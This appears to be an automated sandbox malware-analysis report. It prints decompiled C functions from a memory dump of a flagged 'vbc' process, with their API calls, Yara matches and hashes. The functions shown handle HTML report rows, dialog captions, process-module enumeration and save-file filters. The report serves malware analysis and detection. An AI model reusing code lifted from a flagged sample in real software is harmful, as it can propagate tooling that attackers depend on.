                                                                • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                              • CloseHandle.KERNEL32(?), ref: 00410C37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                              • String ID: rA
                                                              • API String ID: 1886237854-474049127
                                                              • Opcode ID: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                              • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                              • Opcode Fuzzy Hash: 8653955e969841bc6e3a3e35dce332f3a7803eb0c6ec2ee91436e81d7ec50ab4
                                                              • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409E32(void* __eax, void* __ecx, intOrPtr* __edi, void* __esi) {
                                                              
                                                              				 *__edi =  *__edi + __ecx;
                                                              			}



                                                              0x00409e38

                                                              APIs
                                                                • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                              • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                              • String ID:
                                                              • API String ID: 3673709545-0
                                                              • Opcode ID: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                              • Instruction ID: 438777344fc2c20ac6f2013a54106063ce42bca0c095daa55fabf7fed0819ee6
                                                              • Opcode Fuzzy Hash: 5410ace1bcb9ce3ecfd17fbb561b86d7ddab7c6c2c1515389eccb8c098e49f00
                                                              • Instruction Fuzzy Hash: 4E013C71280304BFFA325B60EE4BFD67AA6EB48B01F004425F349A90E1C7F56C61DA18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00409E33(void* __eax, void* __ecx, intOrPtr* __edi) {
                                                              
                                                              				 *__edi =  *__edi + __ecx;
                                                              			}



                                                              0x00409e38

                                                              APIs
                                                                • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001037,00000000,00000000), ref: 0040A026
                                                                • Part of subcall function 0040A00B: SendMessageA.USER32(?,00001036,00000000,00000000), ref: 0040A040
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001,00000001), ref: 00409E57
                                                              • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409E66
                                                              • LoadIconA.USER32(000000CE), ref: 00409E7D
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00409E8E
                                                              • LoadIconA.USER32(000000CF), ref: 00409E9B
                                                              • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00409EA6
                                                              • SendMessageA.USER32(?,00001003,00000002,?), ref: 00409EBB
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Image$IconList_$MessageSend$LoadReplace$CountCreate
                                                              • String ID:
                                                              • API String ID: 3673709545-0
                                                              • Opcode ID: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                              • Instruction ID: f483db5831cad9889e7f207d848437a4a82f195d6e7bb7359e2425aa16285a4b
                                                              • Opcode Fuzzy Hash: 20c5cb9973f99a89e878d6eee6cca72c3a181af6a96d535eb3513ac49921a140
                                                              • Instruction Fuzzy Hash: 98011971281304BFFA321B60EE47FD97BA6EB48B00F014425F749A90E2CBF16860DA18
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E00407D0A(void* __eflags, struct HWND__* _a4) {
                                                              				void _v4103;
                                                              				char _v4104;
                                                              				void* _t8;
                                                              				void* _t17;
                                                              
                                                              				_t8 = E004118A0(0x1004, _t17);
                                                              				_t21 =  *0x4171b8;
                                                              				if( *0x4171b8 != 0) {
                                                              					_v4104 = 0;
                                                              					memset( &_v4103, 0, 0x1000);
                                                              					sprintf(0x4172c0, "dialog_%d",  *0x417300);
                                                              					if(E00407DE5(_t17, _t21, "caption",  &_v4104) != 0) {
                                                              						SetWindowTextA(_a4,  &_v4104);
                                                              					}
                                                              					return EnumChildWindows(_a4, E00407CAD, 0);
                                                              				}
                                                              				return _t8;
                                                              			}







                                                              0x00407d12
                                                              0x00407d17
                                                              0x00407d1e
                                                              0x00407d2e
                                                              0x00407d35
                                                              0x00407d4a
                                                              0x00407d65
                                                              0x00407d71
                                                              0x00407d71
                                                              0x00000000
                                                              0x00407d81
                                                              0x00407d88

                                                              APIs
                                                              • memset.MSVCRT ref: 00407D35
                                                              • sprintf.MSVCRT ref: 00407D4A
                                                                • Part of subcall function 00407DE5: memset.MSVCRT ref: 00407E09
                                                                • Part of subcall function 00407DE5: GetPrivateProfileStringA.KERNEL32(004172C0,0000000A,00412466,?,00001000,004171B8), ref: 00407E2B
                                                                • Part of subcall function 00407DE5: strcpy.MSVCRT(?,?), ref: 00407E45
                                                              • SetWindowTextA.USER32(?,?), ref: 00407D71
                                                              • EnumChildWindows.USER32 ref: 00407D81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindowssprintfstrcpy
                                                              • String ID: caption$dialog_%d
                                                              • API String ID: 246480800-4161923789
                                                              • Opcode ID: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                              • Instruction ID: 1b9ef3c80e7b29f71c03deb4ce56ff4662aaf0b85baafec8cd622ba642293ebf
                                                              • Opcode Fuzzy Hash: 9cc970e277697b76041602e023995f54401f13df9d738430129227da823c9158
                                                              • Instruction Fuzzy Hash: 40F02B305482887EEB12AB91DC06FE83B685F08786F0040B6BB44E11E0D7F85AC0C71E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 35%
                                                              			E0040E255(void* __ecx, void* __eflags, long _a4, intOrPtr _a8) {
                                                              				void* _v8;
                                                              				signed int _v12;
                                                              				unsigned int _v16;
                                                              				int _v20;
                                                              				intOrPtr _v28;
                                                              				char _v32;
                                                              				intOrPtr _v40;
                                                              				intOrPtr _v44;
                                                              				char _v308;
                                                              				intOrPtr _v312;
                                                              				void _v316;
                                                              				void _v579;
                                                              				char _v580;
                                                              				char _v844;
                                                              				intOrPtr _v1104;
                                                              				intOrPtr _v1108;
                                                              				intOrPtr _v1112;
                                                              				char _v1132;
                                                              				char _v17516;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t63;
                                                              				void* _t64;
                                                              				void* _t77;
                                                              				intOrPtr _t84;
                                                              				void _t94;
                                                              				int _t102;
                                                              				void* _t106;
                                                              				void* _t107;
                                                              
                                                              				E004118A0(0x446c, __ecx);
                                                              				_t102 = 0;
                                                              				_v20 = 0;
                                                              				if(E0040629C() == 0 ||  *0x417518 == 0) {
                                                              					if( *0x417514 != _t102) {
                                                              						_t94 = _a4;
                                                              						_t63 =  *0x416fe0(8, _t94);
                                                              						_v8 = _t63;
                                                              						if(_t63 != 0xffffffff) {
                                                              							_v20 = 1;
                                                              							_v1132 = 0x224;
                                                              							_t64 =  *0x416fd8(_t63,  &_v1132);
                                                              							while(_t64 != 0) {
                                                              								memset( &_v316, _t102, 0x118);
                                                              								_v312 = _v1104;
                                                              								_v316 = _t94;
                                                              								strcpy( &_v308,  &_v844);
                                                              								_v44 = _v1108;
                                                              								_t107 = _t107 + 0x14;
                                                              								_v40 = _v1112;
                                                              								_v1132 = 0x224;
                                                              								if(E0040E45F(_a8,  &_v316) != 0) {
                                                              									_t64 =  *0x416fd4(_v8,  &_v1132);
                                                              									continue;
                                                              								}
                                                              								goto L18;
                                                              							}
                                                              							goto L18;
                                                              						}
                                                              					}
                                                              				} else {
                                                              					_t77 = OpenProcess(0x410, 0, _a4);
                                                              					_v8 = _t77;
                                                              					if(_t77 != 0) {
                                                              						_push( &_v16);
                                                              						_push(0x4000);
                                                              						_push( &_v17516);
                                                              						_push(_t77);
                                                              						if( *0x416fe4() != 0) {
                                                              							_t6 =  &_v16;
                                                              							 *_t6 = _v16 >> 2;
                                                              							_v20 = 1;
                                                              							_v12 = 0;
                                                              							if( *_t6 != 0) {
                                                              								while(1) {
                                                              									_v580 = 0;
                                                              									memset( &_v579, _t102, 0x104);
                                                              									memset( &_v316, _t102, 0x118);
                                                              									_t84 =  *((intOrPtr*)(_t106 + _v12 * 4 - 0x4468));
                                                              									_t107 = _t107 + 0x18;
                                                              									_v316 = _a4;
                                                              									_v312 = _t84;
                                                              									 *0x416fdc(_v8, _t84,  &_v580, 0x104);
                                                              									E0040E172( &_v308,  &_v580);
                                                              									_push(0xc);
                                                              									_push( &_v32);
                                                              									_push(_v312);
                                                              									_push(_v8);
                                                              									if( *0x416fe8() != 0) {
                                                              										_v44 = _v28;
                                                              										_v40 = _v32;
                                                              									}
                                                              									if(E0040E45F(_a8,  &_v316) == 0) {
                                                              										goto L18;
                                                              									}
                                                              									_v12 = _v12 + 1;
                                                              									if(_v12 < _v16) {
                                                              										_t102 = 0;
                                                              										continue;
                                                              									} else {
                                                              									}
                                                              									goto L18;
                                                              								}
                                                              							}
                                                              						}
                                                              						L18:
                                                              						CloseHandle(_v8);
                                                              					}
                                                              				}
                                                              				return _v20;
                                                              			}
































                                                              0x0040e25d
                                                              0x0040e265
                                                              0x0040e267
                                                              0x0040e271
                                                              0x0040e395
                                                              0x0040e39b
                                                              0x0040e3a1
                                                              0x0040e3aa
                                                              0x0040e3ad
                                                              0x0040e3c0
                                                              0x0040e3c7
                                                              0x0040e3cd
                                                              0x0040e44a
                                                              0x0040e3e2
                                                              0x0040e3ed
                                                              0x0040e401
                                                              0x0040e407
                                                              0x0040e412
                                                              0x0040e41b
                                                              0x0040e41e
                                                              0x0040e42b
                                                              0x0040e438
                                                              0x0040e444
                                                              0x00000000
                                                              0x0040e444
                                                              0x00000000
                                                              0x0040e438
                                                              0x00000000
                                                              0x0040e44a
                                                              0x0040e3ad
                                                              0x0040e283
                                                              0x0040e28c
                                                              0x0040e294
                                                              0x0040e297
                                                              0x0040e2a0
                                                              0x0040e2a1
                                                              0x0040e2ac
                                                              0x0040e2ad
                                                              0x0040e2b6
                                                              0x0040e2bc
                                                              0x0040e2bc
                                                              0x0040e2c0
                                                              0x0040e2c7
                                                              0x0040e2ca
                                                              0x0040e2d9
                                                              0x0040e2e2
                                                              0x0040e2e9
                                                              0x0040e2fb
                                                              0x0040e306
                                                              0x0040e30d
                                                              0x0040e311
                                                              0x0040e322
                                                              0x0040e328
                                                              0x0040e33a
                                                              0x0040e33f
                                                              0x0040e344
                                                              0x0040e345
                                                              0x0040e34b
                                                              0x0040e356
                                                              0x0040e35b
                                                              0x0040e361
                                                              0x0040e361
                                                              0x0040e375
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e37b
                                                              0x0040e384
                                                              0x0040e2d7
                                                              0x00000000
                                                              0x00000000
                                                              0x0040e38a
                                                              0x00000000
                                                              0x0040e384
                                                              0x0040e2d9
                                                              0x0040e2ca
                                                              0x0040e44e
                                                              0x0040e451
                                                              0x0040e451
                                                              0x0040e297
                                                              0x0040e45e

                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040DD5F,00000000,00000000), ref: 0040E28C
                                                              • memset.MSVCRT ref: 0040E2E9
                                                              • memset.MSVCRT ref: 0040E2FB
                                                                • Part of subcall function 0040E172: strcpy.MSVCRT(?,-00000001), ref: 0040E198
                                                              • memset.MSVCRT ref: 0040E3E2
                                                              • strcpy.MSVCRT(?,?,?,00000000,00000118), ref: 0040E407
                                                              • CloseHandle.KERNEL32(00000000,0040DD5F,?), ref: 0040E451
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: memset$strcpy$CloseHandleOpenProcess
                                                              • String ID:
                                                              • API String ID: 3799309942-0
                                                              • Opcode ID: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                              • Instruction ID: 14fca006082a3f7ea55a807dd49808cd12c96cdbdfea8439eb00a9ee5a281ce1
                                                              • Opcode Fuzzy Hash: 090a920ccff3a4e303efb007cbafe5d1b02941aedbce4837af1c52a6e7a2511d
                                                              • Instruction Fuzzy Hash: A2512DB1900218ABDB10DF95DC85ADEBBB8FF44304F1045AAF609B6291D7749F90CF69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 61%
                                                              			E00409369(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
                                                              				signed int _v8;
                                                              				char* _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				signed int _v24;
                                                              				signed int _v28;
                                                              				char _v48;
                                                              				char _v68;
                                                              				void _v96;
                                                              				void* __edi;
                                                              				signed int _t51;
                                                              				char* _t53;
                                                              				char* _t63;
                                                              				intOrPtr* _t69;
                                                              				signed int _t70;
                                                              				char _t84;
                                                              				intOrPtr* _t91;
                                                              				signed int _t95;
                                                              				void* _t96;
                                                              				void* _t97;
                                                              
                                                              				_t69 = __ebx;
                                                              				_t70 = 6;
                                                              				memcpy( &_v96, "<td bgcolor=#%s nowrap>%s", _t70 << 2);
                                                              				_t97 = _t96 + 0xc;
                                                              				asm("movsw");
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				asm("movsd");
                                                              				asm("movsw");
                                                              				asm("movsb");
                                                              				E00405EFD(_a4, "<tr>");
                                                              				_t95 = 0;
                                                              				if( *((intOrPtr*)(__ebx + 0x20)) > 0) {
                                                              					do {
                                                              						_t51 =  *( *((intOrPtr*)(_t69 + 0x24)) + _t95 * 4);
                                                              						_v8 = _t51;
                                                              						_t53 =  &_v96;
                                                              						if( *((intOrPtr*)((_t51 << 4) +  *((intOrPtr*)(_t69 + 0x34)) + 4)) == 0) {
                                                              							_t53 =  &_v48;
                                                              						}
                                                              						_t91 = _a8;
                                                              						_v28 = _v28 | 0xffffffff;
                                                              						_v24 = _v24 | 0xffffffff;
                                                              						_v20 = _v20 | 0xffffffff;
                                                              						_v16 = _v16 & 0x00000000;
                                                              						_v12 = _t53;
                                                              						 *((intOrPtr*)( *_t69 + 0x30))(4, _t95, _t91,  &_v28);
                                                              						E0040F071(_v28,  &_v68);
                                                              						E0040F09D( *((intOrPtr*)( *_t91))(_v8,  *(_t69 + 0x4c)),  *(_t69 + 0x50));
                                                              						 *((intOrPtr*)( *_t69 + 0x48))( *(_t69 + 0x50), _t91, _v8);
                                                              						_t63 =  *(_t69 + 0x50);
                                                              						_t84 =  *_t63;
                                                              						if(_t84 == 0 || _t84 == 0x20) {
                                                              							strcat(_t63, "&nbsp;");
                                                              						}
                                                              						E0040F126( &_v28,  *((intOrPtr*)(_t69 + 0x54)),  *(_t69 + 0x50));
                                                              						sprintf( *(_t69 + 0x4c), _v12,  &_v68,  *((intOrPtr*)(_t69 + 0x54)));
                                                              						E00405EFD(_a4,  *(_t69 + 0x4c));
                                                              						_t97 = _t97 + 0x20;
                                                              						_t95 = _t95 + 1;
                                                              					} while (_t95 <  *((intOrPtr*)(_t69 + 0x20)));
                                                              				}
                                                              				return E00405EFD(_a4, 0x412b1c);
                                                              			}























                                                              0x00409369
                                                              0x00409373
                                                              0x0040937c
                                                              0x0040937c
                                                              0x0040937e
                                                              0x00409388
                                                              0x00409389
                                                              0x0040938a
                                                              0x0040938b
                                                              0x0040938c
                                                              0x00409396
                                                              0x00409397
                                                              0x0040939c
                                                              0x004093a3
                                                              0x004093a9
                                                              0x004093ac
                                                              0x004093b2
                                                              0x004093bd
                                                              0x004093c0
                                                              0x004093c2
                                                              0x004093c2
                                                              0x004093c5
                                                              0x004093c8
                                                              0x004093cc
                                                              0x004093d0
                                                              0x004093d4
                                                              0x004093de
                                                              0x004093e7
                                                              0x004093f1
                                                              0x00409407
                                                              0x00409417
                                                              0x0040941a
                                                              0x0040941d
                                                              0x00409421
                                                              0x0040942e
                                                              0x00409434
                                                              0x0040943e
                                                              0x00409450
                                                              0x0040945b
                                                              0x00409460
                                                              0x00409463
                                                              0x00409464
                                                              0x004093a9
                                                              0x0040947f

                                                              APIs
                                                                • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                              • strcat.MSVCRT(?,&nbsp;), ref: 0040942E
                                                              • sprintf.MSVCRT ref: 00409450
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWritesprintfstrcatstrlen
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 3813295786-4153097237
                                                              • Opcode ID: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                              • Instruction ID: 5cc8281df9b45005db58bfc05dfa6f470ea1610febbae0d5d066e94f32a410cd
                                                              • Opcode Fuzzy Hash: de7b970c7ee51d784ccd368963446ea6545f22e24ac9db830538cbfa5b1be59e
                                                              • Instruction Fuzzy Hash: 0C316B31900208AFCF15DF94C8869DE7BB6FF44310F1041AAFD11AB2E2D776AA55DB84
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 73%
                                                              			E00410A8A(void* __ecx, void* __eflags, intOrPtr* _a4, int _a8) {
                                                              				void* _v8;
                                                              				intOrPtr* _v12;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				intOrPtr _v288;
                                                              				intOrPtr _v800;
                                                              				char _v1568;
                                                              				char _v1824;
                                                              				intOrPtr _v1828;
                                                              				intOrPtr _v1840;
                                                              				intOrPtr _v1844;
                                                              				intOrPtr _v2100;
                                                              				intOrPtr _v2612;
                                                              				char _v3124;
                                                              				char _v3636;
                                                              				intOrPtr _v3640;
                                                              				void* _v5768;
                                                              				char _v5796;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				char* _t39;
                                                              				intOrPtr _t51;
                                                              				int _t60;
                                                              				intOrPtr* _t73;
                                                              				int _t76;
                                                              				void* _t80;
                                                              
                                                              				_t80 = __eflags;
                                                              				E004118A0(0x16a0, __ecx);
                                                              				_t39 = wcslen(_a8);
                                                              				_t2 =  &(_t39[1]); // 0x1
                                                              				_t76 = _t2;
                                                              				_push(_t76);
                                                              				L004115D0();
                                                              				_t60 = 0;
                                                              				_v8 = _t39;
                                                              				 *_t39 = 0;
                                                              				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t39, _t76, 0, 0);
                                                              				_t77 =  &_v5796;
                                                              				E0040FE05( &_v5796, _t80);
                                                              				_v5796 = 0x4144ac;
                                                              				E004104BC( &_v3636);
                                                              				E004104BC( &_v1824);
                                                              				_t73 = _a4;
                                                              				_v3640 =  *((intOrPtr*)(_t73 + 4));
                                                              				_v12 = _t73;
                                                              				_a8 = strlen(_v8);
                                                              				E0040FF76(_t47, _t77);
                                                              				memcpy(_v5768, _v8, _a8);
                                                              				E00410081(_t77, _t80);
                                                              				_t51 =  *((intOrPtr*)(_t73 + 4));
                                                              				_v1840 = _t51;
                                                              				_v28 = _t51;
                                                              				if(_v2100 != 0 || _v2612 != 0) {
                                                              					if(_v1844 != _t60) {
                                                              						if(_v1568 != _t60) {
                                                              							E004060D0(0xff,  &_v3124,  &_v1568);
                                                              							_t73 = _a4;
                                                              							_v1828 = _v24;
                                                              							_t60 = 0;
                                                              						}
                                                              						 *((intOrPtr*)( *_t73))( &_v3636);
                                                              					}
                                                              				}
                                                              				if(_v288 != _t60 || _v800 != _t60) {
                                                              					if(_v32 != _t60) {
                                                              						 *((intOrPtr*)( *_t73))( &_v1824);
                                                              					}
                                                              				}
                                                              				_push(_v8);
                                                              				L004115D6();
                                                              				return E0040FEED( &_v5796);
                                                              			}































                                                              0x00410a8a
                                                              0x00410a92
                                                              0x00410a9d
                                                              0x00410aa2
                                                              0x00410aa2
                                                              0x00410aa5
                                                              0x00410aa6
                                                              0x00410aad
                                                              0x00410ab8
                                                              0x00410abd
                                                              0x00410abf
                                                              0x00410ac5
                                                              0x00410acb
                                                              0x00410ad6
                                                              0x00410ae0
                                                              0x00410aeb
                                                              0x00410af0
                                                              0x00410af9
                                                              0x00410aff
                                                              0x00410b08
                                                              0x00410b0b
                                                              0x00410b1c
                                                              0x00410b26
                                                              0x00410b31
                                                              0x00410b34
                                                              0x00410b3a
                                                              0x00410b3d
                                                              0x00410b4d
                                                              0x00410b55
                                                              0x00410b69
                                                              0x00410b71
                                                              0x00410b75
                                                              0x00410b7b
                                                              0x00410b7b
                                                              0x00410b88
                                                              0x00410b88
                                                              0x00410b4d
                                                              0x00410b90
                                                              0x00410b9d
                                                              0x00410baa
                                                              0x00410baa
                                                              0x00410b9d
                                                              0x00410bac
                                                              0x00410baf
                                                              0x00410bc4

                                                              APIs
                                                              • wcslen.MSVCRT ref: 00410A9D
                                                              • ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE1A
                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE38
                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE53
                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FE7C
                                                                • Part of subcall function 0040FE05: ??2@YAPAXI@Z.MSVCRT ref: 0040FEA0
                                                              • strlen.MSVCRT ref: 00410B02
                                                                • Part of subcall function 0040FF76: ??3@YAXPAX@Z.MSVCRT ref: 0040FF81
                                                                • Part of subcall function 0040FF76: ??2@YAPAXI@Z.MSVCRT ref: 0040FF90
                                                              • memcpy.MSVCRT ref: 00410B1C
                                                              • ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                              Memory Dump Source
                                                              • Source File: 00000008.00000002.262898420.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000008.00000002.262919550.0000000000418000.00000040.00000001.sdmp Download File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_8_2_400000_vbc.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                              • Instruction ID: 5b66efc9566b80317fa540751e9ebc59d69584110078b55da7be64cca713082c
                                                              • Opcode Fuzzy Hash: eda384fdfc038d1513b3794fcc6cadf0bacc3feb473f8e14eb1b45133d0eb622
                                                              • Instruction Fuzzy Hash: 44317672804219AFCF21EFA1C8809EDBBB5AF44314F1440AAE508A3251DB796FC4CF98
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040AB54(void* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                              				char _v8;
                                                              				intOrPtr _v12;
                                                              				intOrPtr _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _v24;
                                                              				intOrPtr _v28;
                                                              				intOrPtr _v32;
                                                              				char* _v36;
                                                              				intOrPtr _v40;
                                                              				char* _v44;
                                                              				intOrPtr _v48;
                                                              				intOrPtr _v52;
                                                              				intOrPtr _v56;
                                                              				intOrPtr _v60;
                                                              				intOrPtr _v64;
                                                              				intOrPtr _v68;
                                                              				char _v72;
                                                              				void _v1095;
                                                              				char _v1096;
                                                              				void* __ebx;
                                                              				char _t29;
                                                              				intOrPtr _t32;
                                                              				intOrPtr _t35;
                                                              				void* _t39;
                                                              				void* _t52;
                                                              				char _t59;
                                                              				char* _t60;
                                                              				intOrPtr _t61;
                                                              
                                                              				_v1096 = 0;
                                                              				memset( &_v1095, 0, 0x3ff);
                                                              				_v8 = 0x747874;
                                                              				_t29 = E004078FF(0x1f5);
                                                              				_t59 = "*.txt";
                                                              				_v72 = _t29;
                                                              				_v68 = _t59;
                                                              				_v64 = E004078FF(0x1f6);
                                                              				_v60 = _t59;
                                                              				_v56 = E004078FF(0x1f7);
                                                              				_v52 = _t59;
                                                              				_t32 = E004078FF(0x1f8);
                                                              				_t60 = "*.htm;*.html";
                                                              				_v48 = _t32;
                                                              				_v44 = _t60;
                                                              				_v40 = E004078FF(0x1f9);
                                                              				_v36 = _t60;
                                                              				_v32 = E004078FF(0x1fa);
                                                              				_v28 = "*.xml";
                                                              				_t35 = E004078FF(0x1fb);
                                                              				_t61 = "*.csv";
                                                              				_v24 = _t35;
                                                              				_v20 = _t61;
                                                              				_v16 = E004078FF(0x1fc);
                                                              				_v12 = _t61;
                                                              				E0040684D( &_v1096,  &_v72, 8);
                                                              				_t52 = 7;
                                                              				_t39 = E004078FF(_t52);
                                                              				_t23 =  &_v8; // 0x747874
                                                              				return E00406680(_a8,  *((intOrPtr*)(_a4 + 0x108)), __edi,  &_v1096, _t39, _t23);
                                                              			}































                                                              0x0040ab6d
                                                              0x0040ab74
                                                              0x0040ab81
                                                              0x0040ab88
                                                              0x0040ab8d
                                                              0x0040ab93
                                                              0x0040ab96
                                                              0x0040aba3
                                                              0x0040aba6
                                                              0x0040abaf
                                                              0x0040abb2
                                                              0x0040abb5
                                                              0x0040abba
                                                              0x0040abc4
                                                              0x0040abc7
                                                              0x0040abd0
                                                              0x0040abd3
                                                              0x0040abe0
                                                              0x0040abe3
                                                              0x0040abea
                                                              0x0040abef
                                                              0x0040abf5
                                                              0x0040abf8
                                                              0x0040ac00
                                                              0x0040ac0f
                                                              0x0040ac12
                                                              0x0040ac1b
                                                              0x0040ac1c
                                                              0x0040ac24
                                                              0x0040ac44

                                                              APIs
                                                              • memset.MSVCRT ref: 0040AB74
                                                                • Part of subcall function 004078FF: LoadStringA.USER32 ref: 004079C8
                                                                • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,74B04DE0), ref: 0040797A
                                                                • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                • Part of subcall function 0040684D: memset.MSVCRT ref: 0040686D
                                                                • Part of subcall function 0040684D: sprintf.MSVCRT ref: 0040689A
                                                                • Part of subcall function 0040684D: strlen.MSVCRT ref: 004068A6
                                                                • Part of subcall function 0040684D: memcpy.MSVCRT ref: 004068BB
